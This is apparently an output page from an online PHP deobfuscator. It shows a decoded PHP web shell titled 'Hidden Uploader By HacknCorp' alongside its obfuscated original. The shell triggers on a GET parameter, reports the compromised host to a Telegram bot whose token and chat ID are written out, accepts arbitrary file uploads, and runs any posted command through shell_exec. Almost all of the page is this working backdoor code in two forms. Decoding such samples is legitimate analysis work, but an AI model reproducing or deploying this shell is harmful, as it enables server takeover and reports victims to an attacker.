Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

if (isset($_GET["\110\x43"])) { $token = "\142\x6f\164\66\x37\71\60\x31\x37\70\x34\x34\x3..

Decoded Output download

<?   if (isset($_GET["HC"])) { $token = "bot6790178447:AAE_hV1KmtjozxpbXfbD_KYvcLTxconofmw"; $chat_id = "6690024002"; $message = "Result Shell : " . $_SERVER["HTTP_HOST"] . $_SERVER["PHP_SELF"]; $apiUrl = "https://api.telegram.org/bot6790178447:AAEwVZSI3R2QzYwLXDwcwUlTqDm164h6ut4/sendMessage"; $data = array("chat_id" => $chat_id, "text" => $message, "parse_mode" => "Markdown"); $ch = curl_init($apiUrl); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($ch); curl_close($ch); if ($result) { $response = json_decode($result, true); if ($response["ok"]) { echo " "; } else { echo "Error: " . $response["description"]; } } else { echo " "; } echo "<body bgcolor=black>
<font color=red size=3>"; echo "<h2>Hidden Uploader By HacknCorp</h2><hr>"; echo "<form action="" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file" />\xa<br />\xa<input type="submit" name="submit" value="Gass Entod!">\xa</form>"; if ($_FILES["file"]["error"] > 0) { echo "Error: " . $_FILES["file"]["error"] . "<br />"; } else { echo "Upload: " . $_FILES["file"]["name"] . "<br />"; echo "Size: " . $_FILES["file"]["size"] / 1024 . " Kb<br />"; echo "Stored in: " . $_FILES["file"]["tmp_name"]; } if (file_exists('' . $_FILES["file"]["name"])) { echo $_FILES["file"]["name"] . " already exists. "; } else { move_uploaded_file($_FILES["file"]["tmp_name"], '' . $_FILES["file"]["name"]); echo "Stored in: " . '' . $_FILES["file"]["name"]; echo "<hr>"; } if (!empty($_POST["cmd"])) { $cmd = shell_exec($_POST["cmd"] . " 2>&1"); } echo "
<div class='mb-3'>\xa    <form method='POST'>\xa        <div class='input-group mb-3'>\xa            <input class='form-control btn-sm' type='text' name='cmd' value='" . htmlspecialchars($_POST["cmd"], ENT_QUOTES, "UTF-8") . "' placeholder='uname -a' {$_r}>\xa            <button class='btn btn-outline-light btn-sm' type='sumbit'><i class='tombol'>gass!</i></button>
        </div>\xa    </form>"; if ($cmd) { echo "
    <div class="container-fluid language-javascript">
        <div class="shell mb-3">
            <pre style="font-size:10px;"><gr>~</gr>$&nbsp;<rd>" . htmlspecialchars($_POST["cmd"]) . "</rd><br><code>" . htmlspecialchars($cmd, ENT_QUOTES, "UTF-8") . "</code></pre>\xa        </div>
    </div>"; } elseif (!$cmd && $_SERVER["REQUEST_METHOD"] == "POST") { echo "
    <div class="container-fluid language-javascript">\xa        <div class="shell mb-3">
            <pre style="font-size:10px;"><code>No result</code></pre>\xa        </div>\xa    </div>
</div>"; } }  
 ?>

Did this file decode correctly?

Original Code

 if (isset($_GET["\110\x43"])) { $token = "\142\x6f\164\66\x37\71\60\x31\x37\70\x34\x34\x37\72\101\101\x45\137\150\126\x31\x4b\x6d\x74\152\x6f\172\170\x70\x62\x58\x66\x62\104\x5f\113\x59\x76\143\x4c\x54\x78\143\x6f\156\157\146\x6d\167"; $chat_id = "\66\66\x39\60\60\x32\64\x30\60\62"; $message = "\x52\x65\x73\x75\154\164\40\x53\x68\x65\154\154\x20\x3a\x20" . $_SERVER["\110\x54\x54\x50\137\x48\117\x53\x54"] . $_SERVER["\120\x48\120\x5f\x53\x45\x4c\106"]; $apiUrl = "\x68\x74\164\x70\x73\72\57\57\141\x70\151\56\x74\145\154\x65\147\162\141\155\x2e\157\162\x67\x2f\142\x6f\x74\x36\67\x39\60\61\67\x38\x34\x34\x37\72\101\101\x45\167\x56\132\x53\x49\x33\x52\62\121\172\131\167\x4c\130\x44\167\143\167\x55\x6c\x54\161\104\x6d\x31\66\64\x68\66\x75\x74\x34\x2f\x73\145\x6e\144\x4d\145\x73\163\141\x67\145"; $data = array("\143\150\x61\164\137\x69\x64" => $chat_id, "\x74\145\x78\164" => $message, "\x70\141\x72\163\x65\x5f\x6d\x6f\x64\x65" => "\115\141\162\x6b\144\x6f\x77\x6e"); $ch = curl_init($apiUrl); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($ch); curl_close($ch); if ($result) { $response = json_decode($result, true); if ($response["\157\x6b"]) { echo "\x20"; } else { echo "\105\x72\162\157\162\x3a\40" . $response["\144\x65\163\x63\162\151\x70\164\x69\157\156"]; } } else { echo "\x20"; } echo "\x3c\x62\157\144\x79\40\142\147\143\x6f\154\157\x72\75\142\x6c\x61\x63\153\x3e\12\x3c\146\157\156\x74\40\x63\157\x6c\157\162\x3d\x72\145\x64\40\x73\151\172\x65\75\x33\x3e"; echo "\74\x68\62\76\110\x69\x64\x64\x65\x6e\40\125\160\x6c\157\141\x64\145\x72\40\102\x79\x20\110\x61\x63\x6b\156\103\x6f\x72\x70\74\57\x68\x32\76\74\150\162\x3e"; echo "\74\x66\x6f\x72\155\x20\x61\x63\164\x69\x6f\x6e\x3d\42\x22\40\x6d\145\164\150\157\144\x3d\x22\x70\x6f\x73\x74\42\x20\x65\156\143\164\171\160\x65\75\42\155\165\154\164\x69\x70\x61\162\164\57\x66\x6f\162\x6d\55\144\141\x74\141\x22\76\12\74\x6c\x61\x62\x65\x6c\x20\146\157\x72\x3d\42\x66\151\x6c\x65\x22\x3e\106\x69\x6c\x65\x6e\x61\x6d\x65\72\74\x2f\154\x61\142\x65\154\x3e\12\x3c\151\156\160\x75\164\x20\164\x79\160\145\75\x22\x66\x69\x6c\145\x22\40\156\141\x6d\145\x3d\42\x66\x69\x6c\x65\42\x20\x69\x64\x3d\42\146\151\x6c\x65\x22\x20\57\x3e\xa\x3c\142\x72\x20\x2f\x3e\xa\x3c\x69\x6e\x70\165\164\x20\164\171\160\145\75\x22\163\x75\142\155\151\x74\42\x20\156\141\155\145\75\x22\163\x75\142\x6d\151\x74\x22\40\x76\141\154\x75\x65\75\42\107\141\x73\x73\40\105\156\164\x6f\x64\41\x22\76\xa\74\57\x66\x6f\x72\x6d\76"; if ($_FILES["\146\151\154\145"]["\x65\162\162\157\162"] > 0) { echo "\x45\162\x72\157\x72\x3a\40" . $_FILES["\146\151\154\x65"]["\x65\x72\x72\157\x72"] . "\74\x62\x72\40\x2f\x3e"; } else { echo "\x55\160\154\x6f\x61\144\x3a\40" . $_FILES["\x66\151\x6c\145"]["\x6e\141\x6d\x65"] . "\74\142\162\x20\x2f\76"; echo "\x53\x69\172\145\72\40" . $_FILES["\x66\151\x6c\145"]["\x73\x69\x7a\x65"] / 1024 . "\40\113\142\74\x62\162\40\x2f\x3e"; echo "\123\164\x6f\162\145\x64\x20\151\156\72\x20" . $_FILES["\x66\x69\154\145"]["\x74\155\x70\137\156\141\x6d\x65"]; } if (file_exists('' . $_FILES["\146\x69\x6c\145"]["\156\x61\x6d\145"])) { echo $_FILES["\x66\x69\x6c\145"]["\x6e\141\x6d\145"] . "\40\141\154\162\x65\141\144\x79\40\x65\170\151\163\164\163\56\x20"; } else { move_uploaded_file($_FILES["\x66\151\x6c\x65"]["\164\x6d\x70\137\x6e\141\x6d\x65"], '' . $_FILES["\x66\x69\154\x65"]["\156\x61\x6d\145"]); echo "\x53\164\x6f\162\x65\144\40\x69\156\x3a\x20" . '' . $_FILES["\x66\x69\154\145"]["\x6e\141\x6d\x65"]; echo "\x3c\x68\162\76"; } if (!empty($_POST["\x63\155\144"])) { $cmd = shell_exec($_POST["\x63\155\144"] . "\x20\x32\76\x26\x31"); } echo "\12\x3c\x64\x69\x76\x20\x63\154\141\x73\x73\75\x27\155\x62\55\63\47\x3e\xa\40\40\40\40\x3c\x66\x6f\162\x6d\40\155\x65\164\150\x6f\144\75\47\x50\117\123\x54\x27\x3e\xa\40\x20\x20\x20\x20\x20\40\40\x3c\x64\x69\x76\x20\143\x6c\x61\163\x73\x3d\47\x69\x6e\160\165\164\55\147\162\x6f\x75\160\40\155\x62\55\63\x27\x3e\xa\x20\x20\40\40\x20\40\40\40\40\x20\x20\40\74\x69\156\x70\x75\x74\x20\x63\154\x61\163\163\75\47\146\x6f\162\x6d\x2d\143\x6f\x6e\x74\x72\157\x6c\40\142\164\156\x2d\163\155\47\x20\x74\x79\160\x65\x3d\x27\164\x65\x78\x74\47\40\156\141\155\145\75\x27\143\155\x64\x27\40\x76\x61\154\x75\145\x3d\x27" . htmlspecialchars($_POST["\x63\x6d\x64"], ENT_QUOTES, "\125\x54\106\x2d\70") . "\x27\40\x70\154\141\143\145\x68\157\x6c\x64\x65\162\75\x27\x75\156\x61\155\x65\x20\x2d\x61\x27\x20{$_r}\x3e\xa\40\40\x20\x20\x20\x20\40\40\x20\40\40\40\74\142\165\164\164\157\156\x20\143\x6c\x61\x73\x73\x3d\47\142\164\x6e\x20\x62\x74\156\55\157\x75\164\x6c\151\x6e\x65\55\154\151\147\150\x74\x20\142\164\x6e\55\x73\155\47\x20\164\171\x70\x65\x3d\x27\163\165\155\142\151\x74\47\x3e\x3c\x69\40\x63\x6c\x61\163\163\x3d\47\x74\x6f\x6d\142\157\x6c\47\x3e\x67\141\163\x73\41\x3c\x2f\x69\76\74\57\142\x75\164\x74\x6f\x6e\76\12\40\x20\40\40\x20\40\40\x20\74\x2f\x64\x69\x76\76\xa\40\40\x20\40\74\x2f\x66\x6f\162\155\76"; if ($cmd) { echo "\12\x20\x20\x20\x20\x3c\144\x69\166\x20\x63\154\x61\x73\x73\75\x22\143\x6f\156\x74\141\x69\156\x65\162\55\x66\154\165\x69\x64\x20\154\141\x6e\147\165\x61\x67\x65\55\x6a\x61\x76\141\163\x63\x72\151\160\164\x22\76\12\40\40\40\40\40\x20\40\x20\74\x64\x69\166\40\x63\x6c\141\163\x73\x3d\42\163\x68\x65\x6c\x6c\40\155\142\55\63\x22\76\12\40\x20\40\40\40\x20\x20\x20\x20\40\40\40\x3c\160\x72\145\40\163\164\x79\154\x65\x3d\42\x66\157\156\164\55\x73\151\172\x65\72\x31\60\x70\x78\73\42\x3e\x3c\147\162\x3e\x7e\x3c\x2f\147\x72\76\x24\x26\156\142\x73\160\x3b\x3c\162\144\76" . htmlspecialchars($_POST["\x63\155\x64"]) . "\x3c\57\162\x64\x3e\x3c\142\162\x3e\74\x63\157\x64\145\x3e" . htmlspecialchars($cmd, ENT_QUOTES, "\x55\x54\x46\55\x38") . "\74\x2f\x63\157\144\145\x3e\x3c\x2f\160\162\145\76\xa\40\40\40\40\x20\x20\x20\40\74\57\144\x69\x76\x3e\12\x20\40\40\x20\74\x2f\144\x69\166\76"; } elseif (!$cmd && $_SERVER["\122\x45\121\125\105\x53\x54\x5f\x4d\x45\124\110\117\104"] == "\x50\x4f\x53\x54") { echo "\12\40\40\x20\x20\x3c\x64\151\166\40\x63\154\x61\x73\163\75\x22\x63\157\x6e\x74\x61\x69\156\145\162\x2d\146\x6c\165\151\x64\x20\x6c\x61\x6e\147\165\141\x67\x65\55\152\141\166\141\x73\143\x72\x69\160\x74\42\x3e\xa\x20\40\x20\x20\40\x20\40\40\x3c\x64\151\x76\40\x63\154\x61\163\x73\x3d\x22\163\x68\x65\x6c\x6c\x20\x6d\x62\x2d\63\x22\76\12\40\40\40\40\40\x20\40\x20\40\x20\40\x20\x3c\x70\162\145\40\x73\x74\171\154\x65\75\x22\x66\157\x6e\164\x2d\163\151\x7a\x65\x3a\x31\60\160\170\73\x22\x3e\74\143\x6f\144\x65\x3e\116\x6f\x20\x72\x65\x73\165\154\164\74\57\x63\157\x64\145\x3e\x3c\x2f\160\162\145\76\xa\x20\x20\x20\40\x20\x20\x20\40\x3c\x2f\144\151\166\x3e\xa\x20\40\40\40\x3c\x2f\x64\x69\166\x3e\12\x3c\x2f\x64\x69\x76\76"; } }

Function Calls

None

Variables

None

Stats

MD5 3cd40c4d7a16648c350278113141ef06
Eval Count 0
Decode Time 64 ms